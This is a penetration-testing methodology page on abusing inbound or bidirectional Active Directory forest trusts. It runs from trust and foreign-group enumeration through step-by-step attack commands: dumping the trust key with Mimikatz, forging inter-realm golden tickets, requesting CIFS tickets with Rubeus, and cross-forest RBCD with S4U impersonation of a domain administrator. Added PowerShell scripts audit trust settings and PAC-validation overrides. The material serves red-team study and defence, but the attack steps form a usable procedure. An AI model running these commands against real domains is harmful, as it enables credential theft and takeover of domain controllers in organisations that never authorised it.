External Forest Domain - One-Way (Inbound) or Bidirectional


In this scenario an external domain trusts you (or both domains trust each other), so you may be able to obtain some form of access to it.

Enumeration

First of all, you need to enumerate the trust:

Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection  : Inbound          --> Inbound trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,DC=external

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cross-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Let's list group members
## Check how "External Admins" is part of the Administrators group on that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.

# Additional trust hygiene checks (AD RSAT / AD module)
Get-ADTrust -Identity domain.external -Properties SelectiveAuthentication,SIDFilteringQuarantined,SIDFilteringForestAware,TGTDelegation,ForestTransitive

SelectiveAuthentication/SIDFiltering* let you see quickly whether cross-forest abuse paths (RBCD, SIDHistory) are likely to work without extra prerequisites.
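The same hygiene check, turned into a trust review script for a defender; this is an added example and not code from the original page. It assumes the ActiveDirectory RSAT module is available and that `SIDFilteringQuarantined` reflects the quarantine (SID filtering) state of an external trust; the meaning of `SIDFilteringForestAware` on forest trusts is reported raw and should be confirmed with netdom.

```powershell
# Added example: audit every trust of the current domain for the conditions this page
# relies on (inbound/bidirectional trust, no selective authentication, no SID filtering).
# Assumes the ActiveDirectory RSAT module.
Import-Module ActiveDirectory

function Get-TrustRiskReport {
    $props = 'Direction','TrustType','ForestTransitive','IntraForest',
             'SelectiveAuthentication','SIDFilteringQuarantined',
             'SIDFilteringForestAware','TGTDelegation'
    foreach ($t in Get-ADTrust -Filter * -Properties $props) {
        $findings = @()

        # Inbound or bidirectional: principals of the remote domain can authenticate here,
        # which is exactly the scenario of this page.
        $acceptsRemote = $t.Direction.ToString() -in 'Inbound','Bidirectional'

        if ($acceptsRemote -and -not $t.SelectiveAuthentication) {
            $findings += 'SelectiveAuthentication disabled: any remote principal may authenticate to any host'
        }
        # External (non-forest) trust: Quarantined = SID filtering enforced (assumption: see lead-in).
        if ($acceptsRemote -and -not $t.ForestTransitive -and -not $t.SIDFilteringQuarantined) {
            $findings += 'SID filtering (quarantine) disabled on external trust: SIDHistory abuse possible'
        }
        # Forest trust: report the flag and verify the effective state with
        #   netdom trust <local domain> /domain:<remote domain> /enablesidhistory
        if ($acceptsRemote -and $t.ForestTransitive) {
            $findings += "Forest trust: SIDFilteringForestAware=$($t.SIDFilteringForestAware) (verify with netdom /enablesidhistory)"
        }
        if ($t.TGTDelegation) {
            $findings += 'TGTDelegation enabled: unconstrained delegation is honoured across the trust'
        }
        [pscustomobject]@{
            Target    = $t.Target
            Direction = $t.Direction
            Forest    = $t.ForestTransitive
            Findings  = ($findings -join '; ')
        }
    }
}

Get-TrustRiskReport | Format-List
```

Any trust with a non-empty Findings field deserves a second look in a trust review, since those are the settings the later sections of this page depend on.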

In the previous enumeration it was found that the user crossuser is inside the External Admins group, which has Admin access inside the DC of the external domain.

Initial Access

If you couldn't find any special access of your user in the other domain, you can still go back to the AD Methodology and try to privesc from an unprivileged user (things like kerberoasting, for example):

You can use Powerview functions to enumerate the other domain using the -Domain param, as in:

Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName

Active Directory Methodology

Impersonation

Logging in

Using a regular method with the credentials of the users with access to the external domain, you should be able to access:

Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator

SID History Abuse

You can also abuse SID History across a forest trust.

If a user is migrated from one forest to another and SID Filtering is not enabled, it becomes possible to add a SID from the other forest, and this SID will be added to the user's token when authenticating across the trust.

Warning

As a reminder, you can get the signing key with

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local

You can sign a TGT impersonating the user of the current domain with the trusted key.

# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we saw the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

Full way to impersonate the user

# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we saw the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

Cross-forest RBCD when you control a machine account in the trusting forest (no SID filtering / selective auth)

If your foreign principal (FSP) lands you in a group that can write computer objects in the trusting forest (e.g., Account Operators, a custom provisioning group), you can set Resource-Based Constrained Delegation on a target host in that forest and impersonate any user there:

# 1) From the trusted domain, create or compromise a machine account (MYLAB$) you control
# 2) In the trusting forest (domain.external), set msDS-AllowedToAct on the target host for that account
Set-ADComputer -Identity victim-host$ -PrincipalsAllowedToDelegateToAccount MYLAB$
# or with PowerView
Set-DomainObject victim-host$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sidbytes_of_MYLAB}

# 3) Use the inter-forest TGT to perform S4U to victim-host$ and get a CIFS ticket as DA of the trusting forest
Rubeus.exe s4u /ticket:interrealm_tgt.kirbi /impersonate:EXTERNAL\Administrator /target:victim-host.domain.external /protocol:rpc

This only works when SelectiveAuthentication is disabled and SID filtering does not filter out your controlling SID. It is a fast lateral path that avoids SIDHistory forging and is often overlooked in trust reviews.

PAC validation hardening

The PAC signature validation updates for CVE-2024-26248/CVE-2024-29056 add signing enforcement on inter-forest tickets. In Compatibility mode, forged inter-realm PAC/SIDHistory/S4U paths can still work against unpatched DCs. In Enforcement mode, unsigned or tampered PAC data crossing a forest trust is rejected unless you also hold the target forest's trust key. Registry overrides (PacSignatureValidationLevel, CrossDomainFilteringLevel) can weaken this for as long as they remain available.
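A posture check for the two registry overrides just mentioned, as an added example that is not part of the original page. It assumes both values live under `HKLM\SYSTEM\CurrentControlSet\Services\Kdc` on each domain controller (as documented for these updates) and that an absent value means the operating system default is in effect; PowerShell Remoting to the DCs is required.

```powershell
# Added example: collect the KDC PAC-validation override state from every DC of the
# current domain. Assumptions: values under HKLM\SYSTEM\CurrentControlSet\Services\Kdc,
# absent value = OS default; WinRM access to each DC.
Import-Module ActiveDirectory

function Get-PacValidationPosture {
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc'
    $names = 'PacSignatureValidationLevel','CrossDomainFilteringLevel'

    foreach ($dc in (Get-ADDomainController -Filter *).HostName) {
        # Read both values remotely; a missing value comes back as $null.
        $vals = Invoke-Command -ComputerName $dc -ArgumentList $key,$names -ScriptBlock {
            param($k, $n)
            $out = @{}
            foreach ($name in $n) {
                $out[$name] = (Get-ItemProperty -Path $k -Name $name -ErrorAction SilentlyContinue).$name
            }
            $out
        }

        # Any explicitly set value is an override that should be compared against the
        # vendor guidance for this update, because it can relax enforcement.
        $override = ($null -ne $vals.PacSignatureValidationLevel) -or
                    ($null -ne $vals.CrossDomainFilteringLevel)

        [pscustomobject]@{
            DC                          = $dc
            PacSignatureValidationLevel = $vals.PacSignatureValidationLevel
            CrossDomainFilteringLevel   = $vals.CrossDomainFilteringLevel
            OverridePresent             = $override
        }
    }
}

Get-PacValidationPosture | Format-Table -AutoSize
```

DCs that report OverridePresent = True, or that differ from each other, are the ones to reconcile before assuming enforcement mode protects the forest trust.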
